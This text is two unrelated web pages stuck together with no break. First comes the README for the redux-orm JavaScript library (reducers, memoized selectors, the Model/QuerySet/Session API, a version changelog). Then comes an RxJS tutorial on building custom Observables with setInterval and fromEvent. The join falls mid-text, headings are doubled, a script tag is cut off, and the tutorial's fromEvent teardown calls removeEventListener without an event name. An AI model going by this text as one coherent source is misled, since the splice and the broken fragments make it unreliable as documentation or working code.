import { createReducer } from 'redux-orm'; import { orm } from './models'; const reducer = createReducer(orm);
createReducer is really simple, so I'll just paste the source here.
function createReducer(orm, updater = defaultUpdater) { return (state, action) => { const session = orm.session(state || orm.getEmptyState()); updater(session, action); return session.state; }; } function defaultUpdater(session, action) { session.sessionBoundModels.forEach(modelClass => { if (typeof modelClass.reducer === 'function') { modelClass.reducer(action, modelClass, session); } }); }
As you can see, it just instantiates a new Session, loops through all the Models in the session, and calls the
reducer method if it exists. Then it returns the new database state that has all the updates applied.
Use with ReactUse with React
Use memoized selectors to make queries into the state.
redux-orm uses smart memoization: the below selector accesses
Author and
AuthorBooks branches (
AuthorBooks is a many-to-many branch generated from the model field declarations), and the selector will be recomputed only if those branches change. The accessed branches are resolved on the first run.
// selectors.js import schema from './schema'; const authorSelector = schema.createSelector(session => { return session.Author.map(author => { // Returns a reference to the raw object in the store, // so it doesn't include any reverse or m2m fields. const obj = author.ref; // Object.keys(obj) === ['id', 'name'] return Object.assign({}, obj, { books: author.books.withRefs.map(book => book.name), }); }); }); // Will result in something like this when run: // [ // { // id: 0, // name: 'Tommi Kaikkonen', // books: ['Introduction to redux-orm', 'Developing Redux applications'], // }, // { // id: 1, // name: 'John Doe', // books: ['John Doe: an Autobiography'] // } // ]
Selectors created with
createSelector can be used as input to any additional
reselect selectors you want to use. They are also great to use with
redux-thunk: get the whole state with
getState(), pass the ORM branch to the selector, and get your results. A good use case is serializing data to a custom format for a 3rd party API call.
Because selectors are memoized, you can use pure rendering in React for performance gains.
// components.js import PureComponent from 'react-pure-render/component'; import { authorSelector } from './selectors'; import { connect } from 'react-redux'; class App extends PureComponent { render() { const authors = this.props.authors.map(author => { return ( <li key={author.id}> {author.name} has written {author.books.join(', ')} </li> ); }); return ( <ul> {authors} </ul> ); } } function mapStateToProps(state) { return { authors: authorSelector(state.orm), }; } export default connect(mapStateToProps)(App);
Understanding redux-ormUnderstanding redux-orm
An ORM?An ORM?
Well, yeah.
redux-orm deals with related data, structured similar to a relational database. The database in this case is a simple JavaScript object database.
Why?Why?
For simple apps, writing reducers by hand is alright, but when the number of object types you have increases and you need to maintain relations between them, things get hairy. ImmutableJS goes a long way to reduce complexity in your reducers, but
redux-orm is specialized for relational data.
ImmutabilityImmutability
Say we start a session from an initial database state situated in the Redux atom, update the name of a certain book.
First, a new session:
import { orm } from './models'; const dbState = getState().db; // getState() returns the redux state. const sess = orm.session(dbState);
The session maintains a reference to a database state. We haven't updated the database state, therefore it is still equal to the original state.
sess.state === dbState // true
Let's apply an update.
const book = sess.Book.withId(1) book.name // 'Refactoring' book.name = 'Clean Code' book.name // 'Clean Code' sess.state === dbState // false.
The update was applied, and because the session does not mutate the original state, it created a new one and swapped
sess.state to point to the new one.
Let's update the database state again through the ORM.
// Save this reference so we can compare. const updatedState = sess.state; book.name = 'Patterns of Enterprise Application Architecture' sess.state === updatedState // true. If possible, future updates are applied with mutations. If you want // to avoid making mutations to a session state, take the session state // and start a new session with that state.
If possible, future updates are applied with mutations. In this case, the database was already mutated, so the pointer doesn't need to change. If you want to avoid making mutations to a session state, take the session state and start a new session with that state.
CustomizabilityCustomizability
Just like you can extend
Model, you can do the same for
QuerySet (customize methods on Model instance collections). You can also specify the whole database implementation yourself (documentation pending).
CaveatsCaveats
The ORM abstraction will never be as performant compared to writing reducers by hand, and adds to the build size of your project (last I checked, minimizing the source files and gzipping yielded about 8 KB). If you have very simple data without relations,
redux-orm may be overkill. The development convenience benefit is considerable though.
APIAPI
ORMORM
See the full documentation for ORM here
Instantiation
const orm = new ORM(); // no arguments needed.
Instance methods:
register(...models: Array<Model>): registers Model classes to the
ORMinstance.
session(state: any): begins a new
Sessionwith
state.
Redux IntegrationRedux Integration
createReducer(orm: ORM): returns a reducer function that can be plugged into Redux. The reducer will return the next state of the database given the provided action. You need to register your models before calling this.
createSelector(orm: ORM, [...inputSelectors], selectorFunc): returns a memoized selector function for
selectorFunc.
selectorFuncreceives
sessionas the first argument, followed by any inputs from
inputSelectors. Read the full documentation for details.
ModelModel
See the full documentation for
Model here.
Instantiation: Don't instantiate directly; use class method
create.
Class Methods:
hasId(id): returns a boolean indicating if entity with id
idexists in the state.
withId(id): gets the Model instance with id
id.
get(matchObj): to get a Model instance based on matching properties in
matchObj,
create(props): to create a new Model instance with
props. If you don't supply an id, the new
idwill be
Math.max(...allOtherIds) + 1.
You will also have access to almost all QuerySet instance methods from the class object for convenience.
Instance Attributes:
ref: returns a direct reference to the plain JavaScript object representing the Model instance in the store.
Instance methods:
equals(otherModel): returns a boolean indicating equality with
otherModel. Equality is determined by shallow comparison of both model's attributes.
set(propertyName, value): updates
propertyNameto
value. Returns
undefined. Is equivalent to normal assignment.
update(mergeObj): merges
mergeObjwith the Model instance properties. Returns
undefined.
delete(): deletes the record for this Model instance in the database. Returns
undefined.
Subclassing:
Use the ES6 syntax to subclass from
Model. Any instance methods you declare will be available on Model instances. Any static methods you declare will be available on the Model class in Sessions.
For the related fields declarations, either set the
fields property on the class or declare a static getter that returns the field declarations like this:
Declaring
fields:
class Book extends Model { static get fields() { return { id: attr(), name: attr(), author: fk('Author'), }; } } // alternative: Book.fields = { id: attr(), name: attr(), author: fk('Author'), }
All the fields
fk,
oneToOne and
many take a single argument, the related model name. The fields will be available as properties on each
Model instance. You can set related fields with the id value of the related instance, or the related instance itself.
For
fk, you can access the reverse relation through
author.bookSet, where the related name is
${modelName}Set. Same goes for
many. For
oneToOne, the reverse relation can be accessed by just the model name the field was declared on:
author.book.
For
many field declarations, accessing the field on a Model instance will return a
QuerySet with two additional methods:
add and
remove. They take 1 or more arguments, where the arguments are either Model instances or their id's. Calling these methods records updates that will be reflected in the next state.
When declaring model classes, always remember to set the
modelName property. It needs to be set explicitly, because running your code through a mangler would otherwise break functionality. The
modelName will be used to resolve all related fields.
Declaring
modelName:
class Book extends Model { static get modelName() { return 'Book'; } } // alternative: Book.modelName = 'Book';
Declaring
options
If you need to specify options to the redux-orm database, you can declare a static
options property on the Model class with an object key. Currently you can specify the id attribute name:
// This is the default value. Book.options = { idAttribute: 'id', };
QuerySetQuerySet
See the full documentation for
QuerySet here.
You can access all of these methods straight from a
Model class, as if they were class methods on
Model. In this case the functions will operate on a QuerySet that includes all the Model instances.
Instance methods:
toRefArray(): returns the objects represented by the
QuerySetas an array of plain JavaScript objects. The objects are direct references to the store.
toModelArray(): returns the objects represented by the
QuerySetas an array of
Modelinstances objects.
count(): returns the number of
Modelinstances in the
QuerySet.
exists(): return
trueif number of entities is more than 0, else
false.
filter(filterArg): returns a new
QuerySetrepresenting the records from the parent QuerySet that pass the filter. For
filterArg, you can either pass an object that
redux-ormtries to match to the entities, or a function that returns
trueif you want to have it in the new
QuerySet,
falseif not. The function receives a model instance as its sole argument.
excludereturns a new
QuerySetrepreseting entities in the parent QuerySet that do not pass the filter. Similarly to
filter, you may pass an object for matching (all entities that match will not be in the new
QuerySet) or a function. The function receives a model instance as its sole argument.
all()returns a new
QuerySetwith the same entities.
at(index)returns an
Modelinstance at the supplied
indexin the
QuerySet.
first()returns an
Modelinstance at the
0index.
last()returns an
Modelinstance at the
querySet.count() - 1index.
delete()deleted all entities represented by the
QuerySet.
update(mergeObj)updates all entities represented by the
QuerySetbased on the supplied object. The object will be merged with each entity.
SessionSession
See the full documentation for Session here
Instantiation: you don't need to do this yourself. Use
orm.session.
Instance properties:
state: the current database state in the session.
Additionally, you can access all the registered Models in the schema for querying and updates as properties of this instance. For example, given a schema with
Book and
Author models,
const session = orm.session(state); session.Book // Model class: Book session.Author // Model class: Author session.Book.create({id: 5, name: 'Refactoring', release_year: 1999});
ChangelogChangelog
Minor changes before 1.0.0 can include breaking changes.
0.9.00.9.0
A lot. See the migration guide.
0.8.40.8.4
Adds UMD build to partially fix #41. You can now use or try out
redux-orm through a script tag:
<script src="
redux-orm.js will point to the master version of the library; If you need to stick to a version, make a copy or build it yourself.
0.8.30.8.3
Fixed bug that mutated the backend options in
Model if you supplied custom ones, see Issue 37. Thanks to @diffcunha for the fix!
0.8.20.8.2
Fixed regression in
Model.prototype.update
0.8.10.8.1
Added
babel-runtime to dependencies
0.8.00.8.0
Adds batched mutations. This is a big performance improvement. Previously adding 10,000 objects would take 15s, now it takes about 0.5s. Batched mutations are implemented using
immutable-ops internally.
Breaking changes:
Removed
indexByIdoption from Backend. This means that data will always be stored in both an array of id's and a map of
id => entity, which was the default setting. If you didn't explicitly set
indexByIdto
false, you don't need to change anything.
Batched mutations brought some internal changes. If you had custom
Backendor
Sessionclasses, or have overridden
Model.getNextState, please check out the diff.
0.7.00.7.0
Breaking changes:
Model classes that you access in reducers and selectors are now session-specific. Previously the user-defined Model class reference was used for sessions, with a private
session property changing based on the most recently created session. Now Model classes are given a unique dummy subclass for each session. The subclass will be bound to that specific session. This allows multiple sessions to be used at the same time.
You most likely don't need to change anything. The documentation was written with this feature in mind from the start. As long as you've used the model class references given to you in reducers and selectors as arguments (not the reference to the model class you defined), you're fine.
0.6.00.6.0
Breaking changes:
- When calling
QuerySet.filteror
QuerySet.excludewith an object argument, any values of that object that look like a
Modelinstance (i.e. they have a
getIdproperty that is a function), will be turned into the id of that instance before performing the filtering or excluding.
E.g.
Book.filter({ author: Author.withId(0) });
Is equivalent to
Book.filter({ author: 0 });
0.5.00.5.0
Breaking changes:
- Model instance method
equals(otherModel)now checks if the two model's attributes are shallow equal. Previously, it checked if the id's and model classes are equal.
- Session constructor now receives a Schema instance as its first argument, instead of an array of Model classes (this only affects you if you're manually instantiating Sessions with the
newoperator).
Other changes:
- Added
hasIdstatic method to the Model class. It tests for the existence of the supplied id in the model's state.
- Added instance method
getNextStateto the Session class. This enables you to get the next state without running model-reducers. Useful if you're bootstrapping data, writing tests, or otherwise operating on the data outside reducers. You can pass an options object that currently accepts a
runReducerskey. It's value indicates if reducers should be run or not.
- Improved API documentation.
0.4.00.4.0
- Fixed a bug that mutated props passed to Model constructors, which could be a reference from the state. I highly recommend updating from 0.3.1.
- API cleanup, see breaking changes below.
- Calling getNextState is no longer mandatory in your Model reducers. If your reducer returns
undefined,
getNextStatewill be called for you.
Breaking changes:
- Removed static methods
Model.setOrder()and
Backend.order. If you want ordered entities, use the QuerySet instance method
orderBy.
- Added helpful error messages when trying to add a duplicate many-to-many entry (Model.someManyRelated.add(...)), trying to remove an unexisting many-to-many entry (Model.exampleManyRelated.remove(...)), or creating a Model with duplicate many-to-many entry ids (Model.create(...)).
- Removed ability to supply a mapping function to QuerySet instance method
update. If you need to record updates dynamically based on each entity, iterate through the objects with
forEachand record updates separately:
const authors = publisher.authors; authors.forEach(author => { const isAdult = author.age >= 18; author.update({ isAdult }); })
or use the ability to merge an object with all objects in a QuerySet. Since the update operation is batched for all objects in the QuerySet, it can be more performant with a large amount of entities:
const authors = publisher.authors; const isAdult = author => author.age >= 18; const adultAuthors = authors.filter(isAdult); adultAuthors.update({ isAdult: true }); const youngAuthors = authors.exclude(isAdult); youngAuthors.update({ isAdult: false });
0.3.10.3.1
A descriptive error is now thrown when a reverse field conflicts with another field declaration. For example, the following schema:
class A extends Model {} A.modelName = 'A'; class B extends Model {} B.modelName = 'B'; B.fields = { field1: one('A'), field2: one('A'), };
would try to define the reverse field
b on
A twice, throwing an error with an undescriptive message.
0.3.00.3.0
Breaking changes:
Model.withId(id)now throws if object with id
iddoes not exist in the database.
0.2.00.2.0
Includes various bugfixes and improvements.
Breaking changes:
- Replaced
plainand
modelsinstance attributes in
QuerySetwith
withRefsand
withModelsrespectively. The attributes return a new
QuerySetinstead of modifying the existing one. A
refalias is also added for
withRefs, so you can do
Book.ref.at(2).
- After calling
filter,
excludeor
orderBymethod on a
QuerySetinstance, the
withRefsflag is always flipped off so that calling the same methods on the returned
QuerySetwould use model instances in the operations. Previously the flag value remained after calling those methods.
.toPlain()from
QuerySetis renamed to
.toRefArray()for clarity.
- Added
.toModelArray()method to
QuerySet.
- Removed
.objects()method from
QuerySet. Use
.toRefArray()or
.toModelArray()instead.
- Removed
.toPlain()method from
Model, which returned a copy of the Model instance's property values. To replace that,
refinstance getter was added. It returns a reference to the plain JavaScript object in the database. So you can do
Book.withId(0).ref. If you need a copy, you can do
Object.assign({}, Book.withId(0).ref).
- Removed
.fromEmpty()instance method from
Schema.
- Removed
.setReducer()instance method from
Schema. You can just do
ModelClass.reducer = reducerFunc;.
LicenseLicense
MIT. See
LICENSE | https://www.npmjs.com/package/@hylo/redux-orm | CC-MAIN-2022-21 | en | refinedweb |
If you've ever had a programming interview, you're aware that many C programming interviews include a question about writing a program for the Fibonacci sequence. Many people get perplexed by this seemingly basic question. In this article, we'll look at how to use the Fibonacci sequence in C.
What is a Fibonacci Series?
The Fibonacci sequence is a set of numbers that is generated by adding the two numbers before it. Zero and one are the first two terms, respectively. The terms that follow are created by simply adding the two terms before them.
The Fibonacci Series programme may be written in two ways:
- Fibonacci Series without recursion
- Fibonacci Series using recursion
How to Calculate Fibonacci and its Mathematical Representation?
The Fibonacci Sequence or Series is a set of numbers formed by adding two numbers preceding the following number. The Fibonacci numbers are in the integer sequence of 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, and so on.
By combining the two numbers preceding it, the following number is found; 2 is equal to the sum of the two numbers before it (1+1), 3 is equal to the sum of the two numbers before it (1+2), 5 is equal to the sum of the two numbers before it (2+3), and so on.
An example of a Fibonacci sequence is as follows: 0-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1
The first two terms of the series in the previous example are 0 and 1. These two terms are immediately printed. The first two terms are combined to form the third term. Here, since 0 and 1 are the only options, we get 0+1=1. As a result, the third term is written as 1. The second and third terms are used to create the following term, rather than the initial term. It's done till you have the desired quantity of terms or as the user requests. We used eight terms in the above example.
Example
#include<stdio.h>
int main()
{
int first=0, second=1, i, n, sum=0;
printf("Enter the number of terms: ");
scanf("%d",&n);
//accepting the terms
printf("Fibonacci Series:");
for(i=0 ; i<n ; i++)
{
if(i <= 1)
{
sum=i;
}
//to print 0 and 1
else
{
sum=first + second;
first=second;
second=sum;
//to calculate the remaining terms.
//value of first and second changes as a new term is printed.
}
printf(" %d",sum)
}
return 0;
}
Output
In the above program, all variables are first declared. We set the values for the first and second variables first, which will be used to produce further terms. Then we define the term n, which will be used to keep track of the number of terms. To represent the sum of the two digits, we use the term sum. The most recent term is i. It is used in the for loop for iteration. We take the user's number of terms and store it in n. Then, there's a for loop that goes from 0 to the number of phrases the user requested, which is n.
We first have an if statement within the for loop, with the condition verifying if the value of i is smaller than 1. Depending on the number of terms, either zero or one is printed. When there are more than two terms, it is used to print the initial zero and one.
The else component of the loop is executed if the number of terms is more than one. The addition of the variables first and second is assigned to the variable sum in this section. The sum variable is the following phrase. For example, if the first and second values are 0 and 1, the total value will be 1.
How a Program to Calculate Fibonacci Works?
Program on calculation of Fibonacci works on a straight recursive implementation of the aforementioned mathematical recurrence relation.
Example
//Fibonacci Series using Recursion
#include<bits/stdc++.h>
using namespace std;
int fib(int n)
{
if (n <= 2)
return n;
return fib(n4) + fib(n-2);
}
int main ()
{
int n = 7;
cout << fib(n);
getchar();
return 0;
}
Output
The above example shows that this implementation does a lot of repeated work (see the following recursion tree)
Recursion Tree
Fibonacci Series in C Without Recursion
The goto statement is a type of jump statement that is also known as an unconditional jump statement. Within a function, it can be used to hop from one place to another. The steps are as follows:
// C program to print Fibonacci Series
// using goto statement
#include <stdio.h>
// Function to print Fibonacci Number
// using goto statement
void fibUsingGoto(int N)
{
int a = 0, b = 1, sum = 0;
lableFib:
// Print to series first N term
if (N != 0) {
// Print series
printf(" %d", a);
// Create next term
sum = a + b;
a = b;
b = sum;
// Decrement N
N--;
goto lableFib;
}
}
// Driver Code
int main()
{
// Given number N
int N = 10;
// Function Call
fibUsingGoto(N);
return 0;
}
Output
Fibonacci Series in C Using Recursion
Declare three variables as 0, 1, and 0 accordingly for a, b, and total. With the first term, second term, and the current sum of the Fibonacci sequence, use the fib() method repeatedly. After the main function calls the fib() function, the fib() function calls itself until the Fibonacci Series N values are computed. In each recursive call, update the values of a, b, and total as shown below:
// C program to print fibonacci
// series using recursion
#include <stdio.h>
// Recursive function to print
// Fibonacci series
void fib(int a, int b, int sum, int N)
{
// Print first N term of the series
if (N != 0) {
printf(" %d", a);
sum = a + b;
a = b;
b = sum;
// Decrement N
N--;
// recursive call function fib
fib(a, b, sum, N);
}
}
// Driver Code
int main()
{
// Given Number N
int N = 10;
// First term as 0
// Second term as 1 and
// Sum of first and second term
fib(0, 1, 0, N);
return 0;
}
Output
Advance your career as a MEAN stack developer with the Full Stack Web Developer - MEAN Stack Master's Program. Enroll now!
Conclusion
Learning about the Fibonacci sequence gives a programmer an understanding on how to solve certain problems that require a solution from a base case. This is also the reason why it is so famous and relevant in the programming world. Want to learn more about such interesting concepts and sharpen your programming skills by learning more advanced topics?
Enroll in Simplilearn’s Full-Stack Web Development Certification Course, to get more grasp on concepts like these with our well curated videos and practical examples. This certification course provides training in almost 30 programming languages and tools and will help you get the mastery in multiple development skills required to become a full-stack developer and land an opportunity to work for the biggest companies in the software development world.
You can also explore our skill up courses platform where we offer numerous free courses in multiple programming languages to help you brush up and improve your coding skills. | https://www.simplilearn.com/tutorials/c-tutorial/fibonacci-series-in-c-using-recursion | CC-MAIN-2022-21 | en | refinedweb |
Hello and welcome to part 4 of our series of having some fun with neural networks, currently with generative networks. Wher we left off, we're building the dataset that we intend to use with our mnist generative model. We left off with quite a few questions. Typically, with ML algorithms, our data needs to be structured in a very specific way. With this generative network, and our goals, we actually have a lot of options for how we want to do this. The format can be anything, and our only goal is really to try to make this as easy as possible for the model to understand.
Right now, our images, being 28x28, are sequence lengths of 28x28, which means a full image would be 784 characters at a mimimum, unless we resize them. That said, our array has extra things like brackets, and spaces between each value. I think a good next step would be to remove the spaces. I cannot imagine any reason why these spaces are meaningful or why they'd be helpful to our model, I think they'll just waste our processing. Let's get rid of them! We should be able to just do:
print(str(pixels).replace(' ',''))
Making our full script:(100) data = np.rint(batch_xs[0]).astype(int) label = np.rint(batch_ys[0]).astype(int) pixels = data.reshape((28,28)) print(data) print(label) print(str(pixels).replace(' ','')) plt.imshow(pixels, cmap='gray') plt.show()
Interestingly, the image I got this time was:
The cleaned array is:
[[0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000001110000000000000000] [0000000001111110000000000000] [0000000000111111100000000000] [0000000000011111110000000000] [0000000000001111111000000000] [0000000000000111111100000000] [0000000000000011111100000000] [0000000000000001111100000000] [0000000000000000111100000000] [0000001111111000111110000000] [0000011111111111111110000000] [0000011100111111111110000000] [0000011100110011111110000000] [0000011110110000011111000000] [0000001111110000011111110000] [0000001111111000111111111000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000] [0000000000000000000000000000]]
At first glance, I have no idea what this is supposed to even be. A coiled snake?
The array is:
[0 0 1 0 0 0 0 0 0 0] ... so it's a 2. Knowing this, I could see that, it's probably a badly scanned 2, where the bottom is merely chopped off.
Anyway, looks like our cleaning method worked, Next, let's clean the one-hot array:
print(str(label).replace(' ',''))
Now, for a 7, this is
[0000000100]
Okay, fairly clean. Let's create a training file now. I think the one-hot array distinction is enough for the generative model to separate numbers. The order of the label and image data will depend on the task we're attempting. If we're attempting to do classification, then we'd want the image data first, then the label in the training data. If we wanted a generative model to take a number, 0-9, and draw that number for us, then we'd want the label array first.
I plan to do both, and I am equally curious about both, but let's try classification first, so let's put the image first, array last.
Let's also assume we were going to make this into a production-like model, we'd need some logic to know when the prediction was done, so I am thinking about using maybe a double colon to differentiate it. It may be the case that the length of the array is enough, I really have no idea. This is all guessing. So the model will be fed the image data, then we'll have it generate 16 or more characters to see the prediction.
So each training sample can be written out like:
classify_data = "{}\n::{}::\n\n".format(str_img, str_label)
Where it's first the image data, then a new line, then, encased in double colons, the label, then two new lines to separate sample sets.
We aren't going to do it yet, but to make the training set to generate a number based on input, we'd probably do:
gen_to_data = "::{}::\n{}\n\n".format(str_label, str_img)
Now, the full script up to this point is something like:
File name/location:
char-rnn-tensorflow-master/data/mnist/mnist-data-creation.py(10000) with open('classify/input.txt','a') as f: for i, data in enumerate(batch_xs): data = np.rint(batch_xs[i]).astype(int) label = np.rint(batch_ys[i]).astype(int) pixels = data.reshape((28,28)) str_label = str(label).replace(' ','') str_img = str(pixels).replace(' ','') #gen_to_data = "::{}::\n{}\n\n".format(str_label, str_img) classify_data = "{}\n::{}::\n\n".format(str_img, str_label) #plt.imshow(pixels, cmap='gray') #plt.show() f.write(classify_data)
Note: I changed the batch size to be 10,000, so we'll have 10K samples of data. I have no idea if this is a worthy size of data or not.
Run this, and you should get the input.txt file. Open it to make sure it looks something like:
If you're not using sublime text, don't mind the right-hand side there, that just shows a zoomed-out view of the entire file.
Alright, this all looks good to me, let's train! If possible, we'd probably like the sequence to be quite large.
python train.py --data_dir=data/mnist/classify --rnn_size=128 --num_layers=3 --batch_size=28 --seq_length=750
I think sequence length is definitely the most important thing here, so I am first trying the above to see if it will fit in my GPU. I lowered back down to 128 nodes per layer, but still trying 3 layers. I think we could probably go with a smaller sequence, such as 250, since thatd still be a sliding window of about a 3rd of the image anyway, it should still be totally possible to classify like this, but we'd be far more dependent on the generative model to do more than just be able to classify, it'd need to also be able to generate numbers by guessing the number the whole time. I think it'd be more likely to go wrong, but, then again, I really don't know. Too large and it might draw numbers based on the previous numbers. Did I mention this is all a test?
The above does fit, but it's REALLY dreadfully slow. I am going to bump down to 250, and maybe try out a longer sequence some time when I have over-night to train. I am going to re-try with:
python train.py --data_dir=data/mnist/classify --rnn_size=128 --num_layers=3 --batch_size=50 --seq_length=250
That's quite a bit faster, I think I will go with that for now. Okay, I am going to eat something. See you in the next part!
Note: during the filming of this part, I decided to try a different method for the classification part, which saw a slight improvement over the above method. Here's the difference:
from tensorflow.examples.tutorials.mnist import input_data import matplotlib.pyplot as plt import numpy as np mnist = input_data.read_data_sets("MNIST_data/", one_hot=True) # mnist.train .test .validate batch_xs, batch_ys = mnist.train.next_batch(10) with open("classify/input.txt","a") as f: for i, data, in enumerate(batch_xs): data = np.rint(batch_xs[i]).astype(int) label = np.rint(batch_ys[i]).astype(int) pixels = data.reshape((28,28)) index_value = np.argmax(label) new_label = np.array(100*[index_value]).reshape((10,10)) str_img = str(pixels).replace(" ","") str_label = str(new_label).replace(" ","") classify_data = "{}\n:{}:\n\n".format(str_img, str_label) f.write(classify_data)
Basically, the label, rather than being one row and one-hot, is instead just a serious of the number we want in repepetion. My line of thinking there is that the model will have more than just one shot to get things right, and will be easier to learn in training. | https://pythonprogramming.net/class-generator-python-playing-neural-network-tensorflow/ | CC-MAIN-2019-26 | en | refinedweb |
Now that you are pretty much a pro at all other things Matplotlib, it is time to learn how to spread your wings a bit and begin working with geo-plotting on maps, using basemap. Basemap works alongside Matplotlib to allow you to plot via latitude and longitude coordinates.
Once you have basemap installed, you can use the following code to quickly show a simple map. This will just render and display a map, but soon we'll be plotting, zooming, and more fun things!
from mpl_toolkits.basemap import Basemap import matplotlib.pyplot as plt m = Basemap(projection='mill',llcrnrlat=-90,urcrnrlat=90,\ llcrnrlon=-180,urcrnrlon=180,resolution='c') m.drawcoastlines() m.fillcontinents() m.drawmapboundary() plt.title("Quick Basemap Example!") plt.show() | https://pythonprogramming.net/geographical-plotting-basemap-tutorial/ | CC-MAIN-2019-26 | en | refinedweb |
What is DNS?
The Domain Name Systems (DNS) is the phonebook of the Internet. Humans access information online through domain names, like nytimes.com or espn.com. Web browsers interact through Internet Protocol (IP) addresses. DN Sname webpage, a translation must occur between what a user types into their web browser (example.com) and the machine-friendly address necessary to locate the example.com webpage..
There are 4 DNS servers involved in loading a webpage:
- DNS recursor - The recursor can be thought of as a librarian who is asked to go find a particular book somewhere in a library. The DNS recursor is a server designed to receive queries from client machines through applications such as web browsers. Typically the recursor is then responsible for making additional requests in order to satisfy the client’s DNS query.
- Root nameserver - The root server is the first step in translating (resolving) human readable host names into IP addresses. It can be thought of like an index in a library that points to different racks of books - typically it serves as a reference to other more specific locations.
- TLD nameserver - The top level domain server (TLD) can be thought of as a specific rack of books in a library. This nameserver is the next step in the search for a specific IP address, and it hosts the last portion of a hostname (In example.com, the TLD server is “com”).
- Authoritative nameserver - This final nameserver can be thought of as a dictionary on a rack of books, in which a specific name can be translated into its definition..
What's the difference between an authoritative DNS server and a recursive DNS resolver?.
Recursive DNS resolver.
Authoritative DNS server
Put simply,..
What are the steps in a DNS lookup?.
The 8 makes a request to.
- The browser makes a HTTP request to the IP address.
- The server at that IP returns the webpage to be rendered in the browser (step 10).
Once the 8 steps of the DNS lookup have returned the IP address for example.com, the browser is able to make the request for the web page:
.
What are the types of DNS Queries?.
3 types of DNS queries:
- Recursive query - In a recursive query, a DNS client requires that a DNS server (typically a DNS recursive resolver) will respond to the client with either the requested resource record or an error message if the resolver can't find the record.
- Iterative query - in this situation the DNS client will allow a DNS server to return the best answer it can. If the queried DNS server does not have a match for the query name, it will return a referral to a DNS server authoritative for a lower level of the domain namespace. The DNS client will then make a query to the referral address. This process continues with additional DNS servers down the query chain until either an error or timeout.
What is DNS caching? Where does DNS caching occur?).
Browser DNS caching.
Operating system (OS) level DNS caching:
- If the resolver does not have the A records, but does have the NS records for the authoritative nameservers, it will query those name servers directly, bypassing several steps in the DNS query. This shortcut prevents lookups from the root and .com nameservers (in our search for example.com) and helps the resolution of the DNS query occur more quickly.
- If the resolver does not have the NS records, it will send a query to the TLD servers (.com in our case), skipping the root server.
- In the unlikely event that the resolver does not have records pointing to the TLD servers, it will then query the root servers. This event typically occurs after a DNS cache has been purged. | https://www.cloudflare.com/fr-fr/learning/dns/what-is-dns/ | CC-MAIN-2019-26 | en | refinedweb |
In this article, you will learn how to implement custom observables via Observable.create method. Furthermore, you will also learn why Observables are lazy. Finally, you will re-create RxJS’s fromEvent and of method to understand the library bit more.
RxJS is the Library for doing Reactive Functional Programming in JavaScript. It combines Observer pattern with Iterator pattern and also adds Array’s extras like map, filter, reduce and other similar methods on top of it. The most important thing is that you can do functional programming with Asynchronous events with RxJS.
Think of RxJS as Lodash for events. — RxJS Docs
Following are some important terms that you should know before you advance to the coding part.
Observable: It’s basically a collection of events.
Observer: Collection of callbacks, which listens to the value emitted by Observable.
Subscription: It basically represents the invocation of Observable. You can unsubscribe to Observable via Subscription.
On API level, Observable is an Object with subscribe method on it. This subscribe method takes the observer as an argument.
{ subscribe(observer); }
This observer object has three methods: next, error, complete.
To emit a value, you can call the observer.next method with the value that you want to emit.
In case there is an error, you can emit that error via observer.error.
Finally, if everything is finished. You can call the observer.complete method to complete the observable.
Following is an example of an Observer.
{ next: x => console.log(x), error: e => console.log(e), complete: () => console.log('complete') }
You can wrap this pattern around any Push API of the Browser.
Let’s consider the example of setInterval.
Take a look at following snippet.
const timeId = setInterval(() => { console.log('setInterval'); }, 1000); // Stoping the Interval clearInterval(timeId);
You called setInterval with an anonymous function. setInterval will run this function every one second. It also returns a timeId for referencing this interval further. To stop the execution at any point, you have to call clearInterval with the timeId as shown above.
Now, let’s wrap it around Observable as follows:
function setIntervalObservable(time) { return { subscribe: (observer) => { const timeId = setInterval(() => { console.log('setInterval'); }, 1000); // Teardown logic here return { unsubscribe: () => { clearInterval(timeId); } } } }; }
Let’s understand this whole bunch of code clearly. The setIntervalObservable function takes time as input and returns an Observable. This Observable has subscribe method which takes observer as input. When you subscribe to that Observable, it fires the setInterval. This subscribe method also returns an object with the unsubscribe method to stop the interval.
You can use this Observable like this:
const interval$ = setIntervalObservable(1000); const subscription = interval$ .subscribe({ next: () => console.log('interval') }); // Stoping Interval at some point subscription.unsubscribe();
Take a look at working demo at JSBin.
Take a closer look at the following code:
const interval$ = setIntervalObservable(1000);
Now, you have created an Observable. But it is not going to do anything until you fire subscribe method. Because the actual work is done inside the subscribe method in the Observable’s implementation. That’s why Observables are lazy.
Observable is an Object with subscribe method on it.
The Real implementation in RxJS is a bit more complex. But in order to use your custom Observable with RxJS’s other methods, you need to use RxJS’s Observable.create method for creating your custom Observables.
This Observable.create method takes subscribe function and returns an Observable.
Observable.create(subscribe): Observable<any>;
This subscribe function is like a blueprint of the Observable where you would define the Observable. It takes observer object as an argument. Now, let’s create our setInterval Observable with create method.
const Observable = Rx.Observable; // or for es6 import // import { Observable } from 'rxjs'; function setIntervalObservable(time) { return Observable.create((observer) => { const timeId = setInterval(() => { console.log('setInterval');}, 1000); // Teardown logic here return () => { clearInterval(timeId); } }); } const interval$ = setIntervalObservable(1000) .subscribe(() => console.log('interval')); // To unsubscribe from Observable, uncomment it to unsubscribe //interval$.unsubscribe();
If you compare this code with one without create method, the major difference is that you have to pass subscribe function to create method. Also, you have to return a function inside the subscribe method instead of an object with an unsubscribe method. This is all handled by RxJS for us.
Take a look at working demo at JSBin.
In this section, you are going to implement a very basic version of RxJS’s fromEvent and of method. The idea is to give more insight about how these methods work and how you can create custom observables according to your own requirements. It’s highly likely that the actual implementation is more complex.
A fromEvent method in RxJS library has the following signature:
fromEvent(target:EventTargetLike, eventName:string) :Observable<T>;
Creates an Observable that emits events of a specific type coming from the given event target. – RxJS Docs.
So basically, with this method, you can listen to events on a specific DOM Node in Observable way. For example:
import { fromEvent } from 'rxjs'; fromEvent(document.querySelector('#myButton', 'click'));
The above code creates an Observable which listens to click event on HTML element with myButton id.
Let’s implement it ourselves. import { Observable } from 'rxjs'; function fromEvent(dom, event) { return Observable.create((observer) => { const handler = (event) => { observer.next(event); }; dom.addEventListener(event, handler); return () => { dom.removeEventListener(handler); } }); }
